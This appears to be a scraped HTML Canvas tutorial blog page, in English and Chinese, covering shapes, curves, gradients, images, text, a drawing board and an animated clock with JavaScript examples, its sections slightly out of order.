• A render function redraws the heart every frame via requestAnimationFrame, producing the animation.

var c1 = document.getElementById("c");
var ctx = c1.getContext("2d");

    class Heart {
    constructor(x, y) {
    this.x = x;
    this.y = y;
    this.color = "red";
    this.isIn = false;
    this.eventMapList = {
    hover: [],
    leave: [],
    };

    c1.onmousemove = (e) => {
    let x = e.offsetX;
    let y = e.offsetY;
    this.isIn = ctx.isPointInPath(this.heartPath, x, y);
    if (this.isIn) {
    this.eventMapList.hover.forEach((item) => {
    item();
    });
    } else {
    this.eventMapList.leave.forEach((item) => {
    item();
    });
    }
    };
    }
    onHover(fn) {
    this.eventMapList.hover.push(fn);
    }
    onLeave(fn) {
    this.eventMapList.leave.push(fn);
    }
    setPosition(x, y) {
    this.x = x;
    this.y = y;
    }
    draw() {
    this.heartPath = new Path2D();
// start point
this.heartPath.moveTo(this.x, this.y);
// 2 control points and 1 end point
    this.heartPath.bezierCurveTo(
    this.x + 50,
    this.y - 50,
    this.x + 100,
    this.y,
    this.x,
    this.y + 50
    );
    this.heartPath.bezierCurveTo(
    this.x - 100,
    this.y,
    this.x - 50,
    this.y - 50,
    this.x,
    this.y
    );
    ctx.save();
    ctx.fillStyle = this.color;
    ctx.fill(this.heartPath);

    ctx.restore();
    }
    }
    let heart = new Heart(100, 100);
    heart.onHover(() => {
    heart.color = "blue";
    });
    heart.onLeave(() => {
    heart.color = "red";
    });
    function render() {
    ctx.clearRect(0, 0, c1.width, c1.height);
    heart.draw();
    requestAnimationFrame(render);
    }
    render();
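A note on the design: storing callbacks in eventMapList mimics the DOM's addEventListener pattern. The Heart class only detects enter/leave and invokes whatever was subscribed, so the hover behavior (here, a color change) stays outside the class and the shape remains reusable.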

27-An Online Drawing Board with Canvas

• Set up a few buttons:

  • boldBtn: thick brush

    • switch to brush mode source-over
    • set the line width to 20
    • update the buttons' active state
    boldBtn.onclick = function () {
    ctx.globalCompositeOperation = 'source-over';
    ctx.lineWidth = 20;
    boldBtn.classList.add('active');
    thinBtn.classList.remove('active');
    clearBtn.classList.remove('active');
    }
  • thinBtn: thin brush

    • switch to brush mode source-over

    • set the line width to 1

    • update the buttons' active state

    thinBtn.onclick = function () {
    ctx.globalCompositeOperation = 'source-over';
    ctx.lineWidth = 1;
    thinBtn.classList.add('active');
    boldBtn.classList.remove('active');
    clearBtn.classList.remove('active');
    }
  • saveBtn: save the image

    • download the current canvas as a file
    saveBtn.onclick = function () {
    var urlData = canvas.toDataURL();
    var downloadA = document.createElement('a');
    downloadA.setAttribute('download', 'cool signature');
    downloadA.href = urlData;
    downloadA.click();
    }
  • color: color picker

    • set the brush color
    inputColor.onchange = function () {
    ctx.strokeStyle = inputColor.value;
    }
  • clearBtn: eraser

    • switch to erase mode destination-out
    • set the line width to 30
    • update the buttons' active state
    clearBtn.onclick = function () {
    ctx.globalCompositeOperation = 'destination-out';
    ctx.lineWidth = 30;
    clearBtn.classList.add('active');
    thinBtn.classList.remove('active');
    boldBtn.classList.remove('active');
    }
  • nullBtn: clear the canvas

    nullBtn.onclick = function () {
    ctx.clearRect(0, 0, 800, 600);
    }
    <canvas id="c" width="600" height="400">
    当前浏览器不支持 canvas,请下载最新的浏览器
    <a href="https://www.google.cn/intl/zh-CN/chrome/">立即下载</a>
    </canvas>
    <hr>
    <button id="boldBtn" type="button">粗线条</button>
    <button id="thinBtn" class="active" type="button">细线条</button>
    <button id="saveBtn" type="button">保存签名</button>
    <input type="color" name="" id="color" value="" />
    <button id="clearBtn">橡皮擦</button>
    <button id="nullBtn">清空画布</button>

<script>
// 1. find the canvas
var canvas = document.getElementById("c");

// check whether getContext exists
if (!canvas.getContext) {
console.log("This browser does not support canvas; please install an up-to-date browser");
}
// 2. get the brush (2D rendering context)
var ctx = canvas.getContext("2d");

var boldBtn = document.querySelector('#boldBtn');
var thinBtn = document.querySelector('#thinBtn');
var inputColor = document.querySelector('#color');
// save-signature button
var saveBtn = document.querySelector('#saveBtn');
// eraser button
var clearBtn = document.querySelector('#clearBtn');
// clear-canvas button
var nullBtn = document.querySelector('#nullBtn');
// whether drawing is currently allowed
var isDraw = false;

canvas.onmousedown = function (event) {
    isDraw = true;
    ctx.beginPath();
    var x = event.pageX - canvas.offsetLeft;
    var y = event.pageY - canvas.offsetTop;
    ctx.moveTo(x, y);
    }

    canvas.onmouseleave = function () {
    isDraw = false;
    ctx.closePath();
    }

    canvas.onmouseup = function () {
    isDraw = false;
    ctx.closePath();
    }

canvas.onmousemove = function (event) {
    if (isDraw) {
    var x = event.pageX - canvas.offsetLeft;
    var y = event.pageY - canvas.offsetTop;
    ctx.lineTo(x, y);
    ctx.stroke();
    }
    }

    boldBtn.onclick = function () {
    ctx.globalCompositeOperation = 'source-over';
    ctx.lineWidth = 20;
    boldBtn.classList.add('active');
    thinBtn.classList.remove('active');
    clearBtn.classList.remove('active');
    }

    thinBtn.onclick = function () {
    ctx.globalCompositeOperation = 'source-over';
    ctx.lineWidth = 1;
    thinBtn.classList.add('active');
    boldBtn.classList.remove('active');
    clearBtn.classList.remove('active');
    }

    clearBtn.onclick = function () {
    ctx.globalCompositeOperation = 'destination-out';
    ctx.lineWidth = 30;
    clearBtn.classList.add('active');
    thinBtn.classList.remove('active');
    boldBtn.classList.remove('active');
    }

    nullBtn.onclick = function () {
    ctx.clearRect(0, 0, 800, 600);
    }

    saveBtn.onclick = function () {
    var urlData = canvas.toDataURL();
    var downloadA = document.createElement('a');
downloadA.setAttribute('download', 'cool signature');
    downloadA.href = urlData;
    downloadA.click();
    }

    inputColor.onchange = function () {
    ctx.strokeStyle = inputColor.value;
    }
    </script>
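A note on saving (standard canvas API behavior, not specific to this post): toDataURL() encodes the bitmap as a PNG data: URL by default; a second form produces a smaller JPEG instead:

// PNG (default) vs. a compressed JPEG of the same drawing
var pngUrl = canvas.toDataURL();                  // "data:image/png;base64,..."
var jpgUrl = canvas.toDataURL('image/jpeg', 0.8); // JPEG at 80% quality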

28-Drawing an Animated Clock

• var time = new Date(); gets the current time.

• render() redraws every frame:

  • draw the dial
    • hour ticks
    • minute ticks
  • draw the hands
    • hour hand
    • minute hand
    • second hand
    var c = document.querySelector("#c");
    var ctx = c.getContext("2d");

function render() {
ctx.clearRect(0, 0, 800, 600);
// save the current coordinate system and context state
ctx.save();
ctx.translate(400, 300);
ctx.rotate(-Math.PI / 2);

ctx.save();
for (var i = 0; i < 12; i++) {
// draw the hour ticks
ctx.beginPath();
ctx.moveTo(170, 0);
ctx.lineTo(190, 0);
ctx.lineWidth = 8;
ctx.strokeStyle = "gray";
ctx.stroke();
ctx.closePath();
ctx.rotate((2 * Math.PI) / 12);
}

ctx.restore();
ctx.save();
for (var i = 0; i < 60; i++) {
// draw the minute ticks
ctx.beginPath();
ctx.moveTo(180, 0);
ctx.lineTo(190, 0);
ctx.lineWidth = 2;
ctx.strokeStyle = "gray";
ctx.stroke();
ctx.closePath();
ctx.rotate((2 * Math.PI) / 60);
}
ctx.restore();
ctx.save();

// get the current time
var time = new Date();
var hour = time.getHours();
var min = time.getMinutes();
var sec = time.getSeconds();
hour = hour >= 12 ? hour - 12 : hour;

// draw the second hand
ctx.rotate(((2 * Math.PI) / 60) * sec);
    ctx.beginPath();
    ctx.moveTo(-30, 0);
    ctx.lineTo(190, 0);
    ctx.lineWidth = 2;
    ctx.strokeStyle = "red";
    ctx.stroke();
    ctx.closePath();
    ctx.restore();
    ctx.save();

// draw the minute hand
    ctx.rotate(
    ((2 * Math.PI) / 60) * min + ((2 * Math.PI) / 60 / 60) * sec
    );
    ctx.beginPath();
    ctx.moveTo(-20, 0);
    ctx.lineTo(130, 0);
    ctx.lineWidth = 4;
    ctx.strokeStyle = "#888";
    ctx.stroke();
    ctx.closePath();
    ctx.restore();
    ctx.save();

// draw the hour hand
    ctx.rotate(
    ((2 * Math.PI) / 12) * hour +
    ((2 * Math.PI) / 12 / 60) * min +
    ((2 * Math.PI) / 12 / 60 / 60) * sec
    );
    ctx.beginPath();
    ctx.moveTo(-15, 0);
    ctx.lineTo(110, 0);
    ctx.lineWidth = 8;
    ctx.strokeStyle = "#333";
    ctx.stroke();
    ctx.closePath();
    ctx.restore();
    ctx.restore();
    requestAnimationFrame(render);
    }

    render();
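Why the initial rotate(-Math.PI / 2): with the canvas's default orientation, an angle of 0 points along the positive x axis (toward 3 o'clock), so the whole dial is first rotated a quarter turn counterclockwise to make angle 0 correspond to 12 o'clock.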

The current time is:

    ]]>
    + 资源

    正文

    01-初识 Canvas

    • 创建一个 canvas:
    1
    <canvas id="c" width="600" height="400"></canvas>
    • 一个 canvas 画布一般包含三要素:

      • id: 标识元素的唯一性

      • width: 画布的宽度

      • height: 画布的高度

    • 在 Canvas 上画画:

      • 找到 ID 为 c 的画布:
    1
    var c = document.getElementById('c')
    • 获取画笔,上下文对象:
    1
    var ctx = c1.getContext('2d');
    • 绘制矩形:fillRect (位置 x, 位置 y, 宽度, 高度)
    1
    ctx.fillRect(100, 100, 100, 100);

    • 完整代码:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>
    <body>
    <!--
    id: 标识元素的唯一性
    width: 画布的宽度
    height: 画布的高度
    -->
    <canvas id="c" width="600" height="400"></canvas>
    <script>
    // 1. 找到画布
    var c = document.getElementById('c')
    // 2. 获取画笔,上下文对象
    var ctx = c1.getContext('2d');
    // 3. 绘制图形
    // 3.1 绘制矩形 fillRect(位置 x, 位置 y, 宽度, 高度)
    ctx.fillRect(100, 100, 100, 100);
    </script>
    </body>
    </html>
    • 最终效果:

    png

    02-canvas上下文对象与浏览器支持

    • 对于不适应 canvas 的浏览器,c.getContext 将会返回空,可以输出提示信息:
    1
    2
    3
    4
    5
    // 判断是否有 getContext
    if(!c.getContext)
    {
    console.log("当前浏览器不支持 canvas,请下载最新的浏览器");
    }
    • 如果不适应 canvas,canvas 里的内容就不会被覆盖,就可以操作一番:
    1
    2
    3
    4
    <canvas id="c" width="600" height="400">
    当前浏览器不支持 canvas,请下载最新的浏览器
    <a href="https://www.google.cn/chrome/index.html">立即下载</a>
    </canvas>
    • 画笔有很多属性,console.log(ctx); 输出它们:

    png


    • 完整代码:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>
    <body>
    <!--
    id: 标识元素的唯一性
    width: 画布的宽度
    height: 画布的高度
    -->
    <canvas id="c" width="600" height="400">
    当前浏览器不支持 canvas,请下载最新的浏览器
    <a href="https://www.google.cn/chrome/index.html">立即下载</a>
    </canvas>
    <script>
    // 1. 找到画布
    var c = document.getElementById('c')
    // 判断是否有 getContext
    if(!c.getContext)
    {
    console.log("当前浏览器不支持 canvas,请下载最新的浏览器");
    }
    // 2. 获取画笔,上下文对象
    var ctx = c1.getContext('2d');
    console.log(ctx);
    // 3. 绘制图形
    // 3.1 绘制矩形 fillRect(位置 x, 位置 y, 宽度, 高度)
    ctx.fillRect(100, 100, 100, 100);
    </script>
    </body>
    </html>

    03-Canvas 填充与路径绘制

    • 在 canvas 中,如果 style 属性设置了大小,则这个画布在网页上的最终显示将会进行拉伸变换。(但是一般是设置相同的)
    1
    <canvas id="c" width="600" height="400" style="width: 200px; height: 200px;"></canvas>

    png


    • 之前使用 ctx.fillRect() 会生成自带填充的矩形,而使用 ctx.strokeRect() 则会以路径形式绘制矩形。
      • strokeRect(x1, y1, 矩形宽度,矩形高度)
        • x1 为矩形左上角的点到画布左上角 x 轴的距离
        • y1 为矩形左上角的点到画布左上角 y 轴的距离
    1
    2
    3
    // 3. 绘制图形
    // 3.2 路径绘制矩形 strokeRect(x1, y1, 矩形宽度,矩形高度)
    ctx.strokeRect(100, 200, 200, 100);

    png


    • 清除画布范围内的矩形:
    1
    ctx.clearRect(0, 0, c1.clientWidth, c1.clientHeight);

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    ctx.strokeRect(100, 200, 200, 100);
    ctx.fillRect(200, 150, 200, 100);
    let height = 0;
    let t1 = setInterval(() => {
    height++;
    ctx.clearRect(0, 0, c1.clientWidth, height);
    if (height > c1.clientHeight)
    {
    clearInterval(t1);
    }
    }, 10);

    • 定义矩形,但不绘制:
    1
    ctx.rect(100, 200, 300, 300);
    • 填充所定义的矩形:
    1
    ctx.fill();
    • 描边所定义的矩形:
    1
    ctx.stroke();

    • ctx.beginPath();ctx.closePath(); 分别表示提笔和抬笔操作,这样绘制的时候不会覆盖之前定义的图形。(有种 Windows 程序设计的味道)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    ctx.beginPath();
    ctx.rect(200, 150, 200, 100);
    ctx.stroke();
    ctx.closePath();

    ctx.beginPath();
    ctx.rect(100, 200, 200, 100);
    ctx.fill();
    ctx.closePath();

    04-canvas绘制圆弧与笑脸

    • arc 是绘制圆弧的方法。
    • ctx.arc(圆心x, 圆心y, 半径, 开始的角度, 结束的角度, 逆时针(true)还是顺时针(false));
    1
    2
    ctx.arc(300, 200, 50, 0, Math.PI / 4);
    ctx.stroke();
    • 使用圆弧工具绘制一个笑脸,记得要分别使用 ctx.beginPath();ctx.closePath(); 提笔和抬笔,不然路径会相连。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    // 绘制一张脸
    ctx.beginPath();
    ctx.arc(75, 75, 50, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();
    // 绘制嘴巴
    ctx.beginPath();
    ctx.arc(75, 75, 35, 0, Math.PI);
    ctx.stroke();
    ctx.closePath();
    // 绘制嘴巴
    ctx.beginPath();
    ctx.arc(60, 65, 5, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();
    // 绘制右眼
    ctx.beginPath();
    ctx.arc(90, 65, 5, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();

    • 上述方法代码太繁琐,改用 moveTo 来移动点。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    ctx.beginPath();
    // 绘制一张脸
    ctx.arc(75, 75, 50, 0, Math.PI * 2);
    ctx.moveTo(110, 75);
    // 绘制嘴巴
    ctx.arc(75, 75, 35, 0, Math.PI);
    ctx.moveTo(65, 65);
    // 绘制嘴巴
    ctx.arc(60, 65, 5, 0, Math.PI * 2);
    ctx.moveTo(95, 65);
    // 绘制右眼
    ctx.arc(90, 65, 5, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();

    • 最终效果:

    05-绘制折线线段

    1
    2
    ctx.moveTo(300, 200);
    ctx.lineTo(350, 250);
    • 将画笔移动到 (300, 200),然后划线至 (350, 250)

    • 范例:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    ctx.beginPath();
    ctx.moveTo(300, 200);
    ctx.lineTo(350, 250);
    ctx.lineTo(350, 200);
    ctx.lineTo(300, 200);
    ctx.stroke();
    ctx.closePath();

    ctx.beginPath();
    ctx.moveTo(200, 100);
    ctx.lineTo(250, 150);
    ctx.lineTo(250, 100);
    ctx.lineTo(200, 100);
    ctx.fill();
    ctx.closePath();
    • 最终效果:

    06-actTo 绘制圆弧方式

    • actTo,用 3 个点控制一段圆弧。

    png

    1
    2
    3
    4
    5
    6
    7
    ctx.beginPath();
    // 第 1 个点
    ctx.moveTo(300, 200);
    // 第 2 个点和第 3 个点,以及圆弧的半径
    ctx.arcTo(300, 250, 250, 250, 50);
    ctx.stroke();
    ctx.closePath();

    png

    07-二次贝塞尔曲线实现聊天气泡框


    png

    • 开始点:moveTo(20,20)
    • 控制点:quadraticCurveTo(20,100,200,20)
    • 结束点:quadraticCurveTo(20,100,200,20)

    • 使用二次贝塞尔曲线画一个聊天气泡框:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    ctx.beginPath();
    ctx.moveTo(200, 300);
    ctx.quadraticCurveTo(150, 300, 150, 200);
    ctx.quadraticCurveTo(150, 100, 300, 100);
    ctx.quadraticCurveTo(450, 100, 450, 200);
    ctx.quadraticCurveTo(450, 300, 250, 300);
    ctx.quadraticCurveTo(250, 350, 150, 350);
    ctx.quadraticCurveTo(200, 350, 200, 300);
    ctx.stroke();
    ctx.closePath();

    png

    08-三次贝塞尔曲线实现献给朋友的爱心


    • 代码:
    1
    2
    3
    4
    5
    6
    ctx.beginPath();
    ctx.moveTo(300, 200);
    ctx.bezierCurveTo(350, 150, 400, 200, 300, 250);
    ctx.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.stroke();
    ctx.closePath();

    png

    09-封装路径Path2d

    • 将之前所画的心形封装成一个路径:
    1
    2
    3
    4
    5
    var heartPath = new Path2D();
    heartPath.moveTo(300, 200);
    heartPath.bezierCurveTo(350, 150, 400, 200, 300, 250);
    heartPath.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.stroke(heartPath);
    • 或是使用 svg 字符串创建一个路径:
    1
    2
    var polyline = new Path2D("M10 10 h 80 v 80 h -80 z");
    ctx.stroke(polyline);
    • 最终效果:

    10-颜色样式控制

    • ctx.strokeStyle = ""ctx.fillStyle = "" 分别设置描边和填充样式。
      • ”red“ 预设颜色。
      • "#ff00ff" 16 进制颜色。
      • rgb(255, 0, 0) RGB 颜色。
      • rgba(200, 200, 255) RGBA 颜色。
    • ctx.globalAlpha = 0.5; 设置全局透明度。

    • 演示效果:

    11-线型渐变和径向渐变


    • 线性渐变:
    1
    2
    3
    4
    5
    6
    let lineGradient = ctx.createLinearGradient(100, 200, 400, 500);
    lineGradient.addColorStop(0, "red");
    lineGradient.addColorStop(0.3, "#ffcccc");
    lineGradient.addColorStop(1, "blue");
    ctx.fillStyle = lineGradient;
    ctx.fillRect(100, 200, 300, 300);

    png


    • 线性渐变动画:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    let index = 0;

    function render()
    {
    ctx.clearRect(0, 0, 600, 400);
    index += 0.01;
    if (index > 1)
    {
    index = 0;
    }
    let linearGradient = ctx.createLinearGradient(100, 200, 400, 500);
    linearGradient.addColorStop(0, "red");
    linearGradient.addColorStop(index, "#ffcccc");
    linearGradient.addColorStop(1, "blue");
    ctx.fillStyle = linearGradient;
    ctx.fillRect(100, 200, 300, 300);
    requestAnimationFrame(render);
    }

    requestAnimationFrame(render);

    1
    2
    3
    4
    5
    6
    7
    let radiaGradient = ctx.createRadialGradient(300, 200, 0, 300, 200, 100);
    radiaGradient.addColorStop(0, "red");
    radiaGradient.addColorStop(0.3, "#ffcccc");
    radiaGradient.addColorStop(1, "blue");
    ctx.fillStyle = radiaGradient;

    ctx.fillRect(0, 0, 600, 400);

    png


    • 径向渐变画个球:
    1
    2
    3
    4
    5
    6
    7
    let radiaGradient = ctx.createRadialGradient(250, 150, 10, 300, 200, 100);
    radiaGradient.addColorStop(0, "#ffcccc");
    radiaGradient.addColorStop(1, "red");
    ctx.fillStyle = radiaGradient;

    ctx.arc(300, 200, 100, 0, Math.PI * 2);
    ctx.fill();

    png

    12-圆锥渐变特效

    1
    2
    3
    4
    5
    6
    7
    // 圆锥渐变 createConicGradient(角度, 位置 x, 位置 y)
    let coneGradient = ctx.createConicGradient(Math.PI / 4, 300, 200);
    coneGradient.addColorStop(0, "red");
    coneGradient.addColorStop(0.5, "yellow");
    coneGradient.addColorStop(1, "blue");
    ctx.fillStyle = coneGradient;
    ctx.fillRect(0, 0, 600, 400);

    13-pattern 印章填充样式

    • createPattern(图片对象,重复方式);
      • 图片对象(可以是 image 对象,也可以是 canvas 对象)
      • 重复方式 repeat, no-repeat, repeat-x, repeat-y
    1
    2
    3
    4
    5
    6
    7
    8
    9
    var img = new Image();
    img.src = "./imgs/money.png"

    img.onload = function(){
    // 创建图案对象 createPattern(图片对象,重复方式)
    var pattern = ctx.createPattern(img, "repeat");
    ctx.fillStyle = pattern;
    ctx.fillRect(0, 0, 600, 400);
    }

    14-线段和虚线样式设置

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    var c = document.getElementById('c')
    var ctx = c.getContext('2d');

    ctx.moveTo(200, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(400, 150);
    // 设置线条样式,默认 1px
    ctx.lineWidth = 40;
    // 设置线条端点样式,butt 平齐,round 半圆,正方形: square
    ctx.lineCap = "square";
    // 设置 2 个线段连接处的样式,mitter 外侧相连的角,round 角被磨圆了。
    ctx.lineJoin = "round";
    ctx.stroke();

    png


    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    var c = document.getElementById('c')
    var ctx = c.getContext('2d');

    ctx.moveTo(290, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(310, 150);
    // 设置线条样式,默认 1px
    ctx.lineWidth = 40;
    // 设置线条端点样式,butt 平齐,round 半圆,正方形: square
    ctx.lineCap = "square";
    // 设置 2 个线段连接处的样式,mitter 外侧相连的角,round 角被磨圆了。
    ctx.lineJoin = "mitter";
    // 对斜截面进行限制
    ctx.miterLimit = 5;
    ctx.stroke();

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    var c = document.getElementById('c')
    var ctx = c.getContext('2d');

    ctx.moveTo(150, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(450, 150);
    // 设置线条样式,默认 1px
    ctx.lineWidth = 2;
    // 设置线条端点样式,butt 平齐,round 半圆,正方形: square
    ctx.lineCap = "square";
    // 设置 2 个线段连接处的样式,mitter 外侧相连的角,round 角被磨圆了。
    ctx.lineJoin = "mitter";
    // 对斜截面进行限制
    ctx.miterLimit = 5;
    // 设置虚线
    ctx.setLineDash([40, 20]);
    ctx.lineDashOffset = 10;
    ctx.stroke();
    • ctx.setLineDash([40, 20]) 方法会设置线条的虚线样式,其中数组中的数字表示虚线和实线的长度(单位为像素)。在本例中,[40, 20] 表示先绘制长度为 40 的实线,再跳过长度为 20 的空白,然后重复这个过程。因此,这段代码将绘制一个由实线和空白组成的虚线。

    • ctx.lineDashOffset = 10 则是设置虚线的偏移量。这个属性可以改变虚线起始点的位置。

    png


    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    var c = document.getElementById('c')
    var ctx = c.getContext('2d');
    let index = 0;

    function render(){
    ctx.clearRect(0, 0, 600, 400);
    index++;
    if (index > 40) {
    index = 0;
    }
    ctx.moveTo(150, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(450, 150);
    // 设置线条样式,默认 1px
    ctx.lineWidth = 2;
    // 设置线条端点样式,butt 平齐,round 半圆,正方形: square
    ctx.lineCap = "square";
    // 设置 2 个线段连接处的样式,mitter 外侧相连的角,round 角被磨圆了。
    ctx.lineJoin = "mitter";
    // 对斜截面进行限制
    ctx.miterLimit = 5;
    // 设置虚线
    ctx.setLineDash([40, 20]);
    ctx.lineDashOffset = index;
    ctx.stroke();
    requestAnimationFrame(render);
    }
    render();

    15-canvas 阴影设置

    • 核心代码:
    1
    2
    3
    4
    5
    // 设置阴影
    ctx.shadowOffsetX = 10;
    ctx.shadowOffsetY = 10;
    ctx.shadowBlur = 5;
    ctx.shadowColor = "rgba(255, 100, 100, 1)";
    • 完整代码:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    // 设置阴影
    ctx.shadowOffsetX = 10;
    ctx.shadowOffsetY = 10;
    ctx.shadowBlur = 5;
    ctx.shadowColor = "rgba(255, 100, 100, 1)";

    ctx.globalAlpha = 0.5;
    // 起点
    var heartPath = new Path2D();
    heartPath.moveTo(300, 200);// 2个控制点、1个终点
    heartPath.bezierCurveTo(350, 150, 400, 200, 300, 250);
    heartPath.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.strokeStyle = "red"
    ctx.stroke(heartPath);

    var chatPath = new Path2D();
    chatPath.moveTo(200, 300);
    chatPath.quadraticCurveTo(150, 300, 150, 200);
    chatPath.quadraticCurveTo(150, 100, 300, 100);
    chatPath.quadraticCurveTo(450, 100, 450, 200);
    chatPath.quadraticCurveTo(450, 300, 250, 300);
    chatPath.quadraticCurveTo(250, 350, 150, 350);
    chatPath.quadraticCurveTo(200, 350, 200, 300);
    ctx.strokeStyle = "#ff00ff";

    ctx.stroke(chatPath);
    ctx.fillStyle = "rgba(255,200,200,0.3)";
    ctx.fill(heartPath);
    // 创建一条折线
    var polyline = new Path2D("M10 10 h 80 v 80 h -80 z");
    ctx.strokeStyle = "rgba(0,0,255)";

    ctx.stroke(polyline);

    png

    16-canvas 绘制图片的三种模式

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    // 获取图片
    let img = new Image();
    img.src = "./imgs/girl.webp";
    img.onload = function (){
    // 第一种方式绘制,(图片对象,水平位置,垂直位置)
    // ctx.drawImage(img, 0, 0);
    // 第二种方式绘制,能够缩放图片(图片对象,水平位置,垂直位置,缩放到对应宽度,缩放到对应高度)
    ctx.drawImage(img, 0, 0, 600, 400);
    // 第三种方式绘制,能够裁剪图片,img 参数后面的四个参数分别为源图片上面你要裁剪的起点位置和矩形的宽高,后面四个参数分别为画布的位置和要渲染的矩形的宽高
    ctx.drawImage(img, 640, 0, 1280, 720, 0, 0, 600, 400);
    }

    17-canvas 绘制动态视频并添加水印

    1
    <video src="./imgs/mov_bbb.mp4" controls></video>
    • <video> 组件可以在网页中显示视频。

    可以把视频里的帧放入 canvas 中,还可以在视频上叠加水印。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>
    <body>
    <canvas id="c" width="600" height="400"></canvas>
    <video style="display: none;" src="./imgs/mov_bbb.mp4" controls></video>
    <button id="btn">播放 / 暂停</button>
    <script>
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    // 获取视频对象
    var video = document.querySelector("video");

    // 获取按钮
    let btn = document.querySelector("#btn");
    btn.onclick = function(){
    video.play();
    render();
    }

    // logo 图片对象
    let img = new Image();
    img.src = "./imgs/logo.png";

    function render(){
    ctx.drawImage(video, 0, 0, 600, 400);
    ctx.drawImage(img, 400, 350, 200, 50);
    requestAnimationFrame(render);
    }
    </script>
    </body>

    18-文字绘制与对齐

    • 绘制文字颜色
    1
    ctx.strokeStyle = "#f00";
    • 设置文字大小与字体
    1
    ctx.font = "100px Microsoft YaHei";
    • 填充渲染文字
      • fillText(文本, 文本的起点 x 坐标, 文本的起点 y 坐标, 绘制文字的最大宽度)
    1
    ctx.fillText("你好", 300, 200);
    • 文本对齐选项 textAlign, start(默认), end, left, right, center
    1
    ctx.textAlign = "center";
    • 文本基线对齐,textBaseline, top, bottom, alphabetic
    1
    ctx.textBaseline = "middle";
    • 文本的方向
    1
    ctx.direction = "rtl";
    • 预测量文本宽度
    1
    2
    let text = ctx.measureText("你好!");
    console.log(text);
    • 绘制文本边框
    1
    ctx.strokeText("你好!", 300, 200);
    • 完整代码
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 文字,大小 / 字体
    ctx.strokeStyle = "#f00";
    ctx.font = "100px Microsoft YaHei";
    // 填充渲染文字
    // fillText(文本, 文本的起点 x 坐标, 文本的起点 y 坐标, 绘制文字的最大宽度)
    // ctx.fillText("你好", 300, 200);
    // 文本对齐选项 textAlign, start(默认), end, left, right, center
    ctx.textAlign = "center";
    // 文本基线对齐,textBaseline, top, bottom, alphabetic
    ctx.textBaseline = "middle";
    // 文本的方向
    ctx.direction = "rtl";
    // 预测量文本宽度
    let text = ctx.measureText("你好!");
    console.log(text);
    ctx.strokeText("你好!", 300, 200);
    ctx.arc(300, 200, 5, 0, 2 * Math.PI);
    ctx.fill();

    png
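​ measureText() 返回的 TextMetrics 对象里最常用的是 width。一个用它给文字画下划线的示意(沿用上文 textAlign = "center" 的设置,文字中心在 (300, 200)):

let metrics = ctx.measureText("你好!");
let w = metrics.width;
// 文字以 x = 300 为中心,下划线从中心向两侧各延伸一半宽度
ctx.beginPath();
ctx.moveTo(300 - w / 2, 260);
ctx.lineTo(300 + w / 2, 260);
ctx.stroke();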

    19-位移_缩放_旋转变换

• ctx.translate(100, 100);
  • 让坐标系原点向右和向下各移动 100px。
• ctx.rotate(Math.PI / 6);
  • 将坐标系顺时针旋转 30°(canvas 的 y 轴向下,正角度为顺时针)。
• ctx.scale(5, 2);
